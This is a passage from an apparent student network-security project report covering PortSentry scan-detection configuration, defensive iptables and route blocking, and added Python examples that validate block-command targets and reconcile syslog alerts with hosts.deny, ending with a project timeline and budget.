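            raise ValueError("port out of range: %d" % p)
        ports.add(p)
    return ports


def is_excluded(conf, proto, port):
    """True if ADVANCED_EXCLUDE_<PROTO> lists the port (stealth modes only)."""
    key = "ADVANCED_EXCLUDE_" + proto.upper()
    return port in port_set(conf.get(key, ""))


def render_kill(template, target):
    """Substitute $TARGET$ after validating that target is a literal IP.

    The rendered string is executed by a shell, so anything that is not a
    plain address (hostnames, shell metacharacters) is refused outright.
    """
    addr = ipaddress.ip_address(target)  # raises ValueError on junk input
    return template.replace("$TARGET$", str(addr))


def render_or_none(template, target):
    """Like render_kill, but returns None instead of raising on bad input."""
    try:
        return render_kill(template, target)
    except ValueError:
        return None


def kill_argv(conf, target):
    """argv list the shell would execute for KILL_ROUTE against target."""
    return shlex.split(render_kill(conf["KILL_ROUTE"], target))


if __name__ == "__main__":
    conf = parse_conf(SAMPLE_CONF)
    print("UDP 68 excluded:", is_excluded(conf, "udp", 68))
    print("KILL_ROUTE argv:", kill_argv(conf, "24.0.0.203"))
    print("hosts.deny line:", render_kill(conf["KILL_HOSTS_DENY"], "24.0.0.203"))
```

The refusal of non-address targets is the point worth keeping in mind when writing your own KILL_ROUTE wrappers: the template is a shell command, so the only safe input for $TARGET$ is an address that has already been parsed as one.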
Edit file: portsentry.ignore (contains IP addresses to ignore):
127.0.0.1
0.0.0.0
Your IP address
The At Home network routinely scans for news servers on port 119 from a server named authorized-scan1.security.home.net. Adding the IP address of this server (24.0.0.203) greatly reduces the logging. I also added their BOOTP server (24.9.139.130).
We manually issued the iptables (RH 7.1 kernel 2.4) commands on my workstation to drop the hosts and deny their scans. At Home users may add the commands to the file /etc/rc.d/rc.local
/sbin/iptables -I INPUT -s 24.0.0.203 -j DROP
/sbin/iptables -I INPUT -s 24.9.139.130 -j DROP
Edit file: Makefile
INSTALLDIR = /opt
And remove the line under "uninstall": (dangerous line!!)
# /bin/rmdir $(INSTALLDIR)
And remove the line under "install": (troublesome line!!)
# chmod 700 $(INSTALLDIR)
Compile: make linux
Install (as root): make install
Run PortSentry for advanced UDP/TCP stealth scan detection:
portsentry -atcp
portsentry -audp
OR use init scripts below in next section.
Check the logfile for hacker attacks. See /var/log/messages, or /var/log/portsentry.log if you are logging to a dedicated file. Also check /etc/hosts.deny to see the list of IP addresses that PortSentry has deemed attackers, and check the "HISTORY_FILE" /opt/portsentry/portsentry.history.
Note: It is possible to have all logging sent to a logging daemon on a single server. This allows the administrator to check the logs on only one server rather than individually on many.
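Checking /var/log/messages against /etc/hosts.deny by hand gets tedious once several hosts are reporting to one log server. The script below is an added example (not PortSentry's code and not the report's Log Monitor): it parses constructed syslog lines in the layout PortSentry 1.x writes ("attackalert: <kind> from host: <name>/<ip> to <TCP|UDP> port: <n>", plus the "Host <ip> has been blocked" confirmation), summarises alerts per source address, and reports any source that raised alerts but never appeared in hosts.deny, which is the case to review because the KILL_* action did not take effect. The log lines, the hosts.deny contents and the addresses are constructed; function names are the example's own.

```python
"""Summarise PortSentry alerts from syslog and reconcile them with hosts.deny.

Added example, not PortSentry's own code. SAMPLE_LOG and SAMPLE_HOSTS_DENY
are constructed; the parser assumes the PortSentry 1.x message layout.
"""
import re
from collections import defaultdict

# Constructed sample of /var/log/messages (documentation-range addresses).
SAMPLE_LOG = """\
May 20 21:14:02 srv portsentry[812]: attackalert: TCP SYN/Normal scan from host: 192.0.2.10/192.0.2.10 to TCP port: 23
May 20 21:14:02 srv portsentry[812]: attackalert: Host 192.0.2.10 has been blocked via wrappers with string: "ALL: 192.0.2.10"
May 20 21:14:03 srv portsentry[812]: attackalert: TCP SYN/Normal scan from host: 192.0.2.10/192.0.2.10 to TCP port: 1080
May 20 21:30:41 srv portsentry[812]: attackalert: TCP SYN/Normal scan from host: 24.0.0.203/24.0.0.203 to TCP port: 119
May 20 21:31:10 srv portsentry[813]: attackalert: UDP scan from host: 198.51.100.7/198.51.100.7 to UDP port: 31337
May 20 21:31:10 srv portsentry[813]: attackalert: Host 198.51.100.7 has been blocked via wrappers with string: "ALL: 198.51.100.7"
May 20 21:40:00 srv sshd[900]: Accepted publickey for admin from 203.0.113.5 port 50210 ssh2
"""

# Constructed sample of /etc/hosts.deny after KILL_HOSTS_DENY="ALL: $TARGET$" ran.
SAMPLE_HOSTS_DENY = """\
# hosts.deny
ALL: 192.0.2.10
ALL: 198.51.100.7
"""

# One scan alert: timestamp, host, pid, kind of scan, source name/ip, proto, port.
ALERT_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ portsentry\[\d+\]: attackalert: '
    r'(?P<kind>.+?) from host: (?P<name>[^/\s]+)/(?P<ip>\S+) '
    r'to (?P<proto>TCP|UDP) port: (?P<port>\d+)$')
# PortSentry's own confirmation that a block action ran for an address.
BLOCK_RE = re.compile(r'attackalert: Host (?P<ip>\S+) has been blocked')


def parse_alerts(text):
    """Return one dict per scan alert; lines from other daemons are ignored."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            alerts.append(d)
    return alerts


def blocked_in_log(text):
    """Addresses PortSentry itself reported as blocked."""
    return {m.group("ip") for m in BLOCK_RE.finditer(text)}


def parse_hosts_deny(text):
    """Addresses listed as 'ALL: <ip>' in hosts.deny."""
    denied = set()
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("ALL:"):
            denied.add(line.split(":", 1)[1].strip())
    return denied


def summarize(alerts):
    """Per source IP: alert count, first/last timestamp, ports touched per protocol."""
    summary = {}
    for a in alerts:
        s = summary.setdefault(a["ip"], {"count": 0, "first": a["ts"],
                                         "last": a["ts"], "ports": defaultdict(set)})
        s["count"] += 1
        s["last"] = a["ts"]
        s["ports"][a["proto"]].add(a["port"])
    return summary


def unblocked_attackers(alerts, denied):
    """Sources that raised alerts but never reached hosts.deny: the KILL_*
    action did not take effect (e.g. wrong firewall path) and needs review."""
    return sorted({a["ip"] for a in alerts} - denied)


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_LOG)
    for ip, s in sorted(summarize(alerts).items()):
        ports = {p: sorted(v) for p, v in s["ports"].items()}
        print("%-15s %2d alerts %s .. %s %s" % (ip, s["count"], s["first"], s["last"], ports))
    denied = parse_hosts_deny(SAMPLE_HOSTS_DENY)
    print("alerted but not in hosts.deny:", unblocked_attackers(alerts, denied))
```

Run against a real log copied from the central logging server, the same functions work line by line; comparing blocked_in_log() with parse_hosts_deny() also catches an edited or rotated hosts.deny that no longer reflects what PortSentry logged.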
Note on Red Hat 7.1: Red Hat Powertools 7.1 now includes portsentry 1.0. I recommend using version 1.1 configured as above. Powertools RPM layout:
• /usr/sbin/portsentry - (chmod 700) executable
• /etc/portsentry/ - (chmod 700) Directory used for configuration files.
• /etc/portsentry/portsentry.conf (chmod 600)
• /etc/portsentry/portsentry.ignore (chmod 600)
• /var/portsentry/portsentry.history
• /var/portsentry/portsentry.blocked
Instead of using a firewall command (ipchains/iptables), a false route is used: /sbin/route add -host $TARGET$ gw 127.0.0.1. My init script calls the portsentry executable twice with the appropriate command line arguments to monitor tcp and udp ports. The Red Hat 7.1 init script uses the file /etc/portsentry/portsentry.modes and a for loop in the init script to call portsentry the appropriate number of times. Their init script also recreates the portsentry.ignore file each time portsentry is started by including the IP addresses found with ifconfig and the addresses 0.0.0.0 and localhost. Persistent addresses must be placed above a line stating "Do NOT edit below this", otherwise they are not included in the creation of the new file.
Appendix C: Timeline and Budget
After conducting an extensive literature survey in the fall semester, and learning about network security theory, we began installing the network as the spring semester was starting and worked on the ‘practical’ part of the FYP according to the following timeline:
• Feb 15th to March 1st: installing the additional RAMs on the computer, installing the Operating Systems and ordering the Firewall/switch.
• March 1st to March 31st: Setting up the network (domain, user accounts…) and increasing network security (patches, service packs, server settings…).
• March 15th to March 31st: Researching Honey Pots.
• March 15th to March 31st: Researching ways to monitor the Logs (log files).
• April 1st and onwards: The external attacks were supposed to start, but the hacker team did not show up until end of April – beginning of May.
• April 1st to April 30th: Writing the Code for the Log Monitor, testing it and installing it on our network (this program was not as necessary during external attacks as it was during internal attacks). Note that since we had a few problems when installing the code on Windows 2000 (it was written on XP – refer to section 4.6), the program was operational a little behind schedule (around May 5th). Nonetheless, this did not affect our security since the hackers’ team had not even started the internal attacks by that time.
• April 1st onwards: choosing the appropriate Honey Pot (Honey D), installing it and configuring it according to our network’s needs.
• The attacks effectively took place during the last 2 or 3 weeks before the FYP report submission date (i.e. May 22). Note that our team stopped monitoring the network on Monday, May 22, 2006 at 6:00pm, i.e. 18 hours before the report submission deadline, in order to focus on writing the report.
Budget:
• Firewall/Switch: $89.00 (paid by AUB)
• Additional RAMs: $120.00 (paid by AUB)
• Printing Reports (Spring + Fall): $100.00
• TOTAL COST: $309.00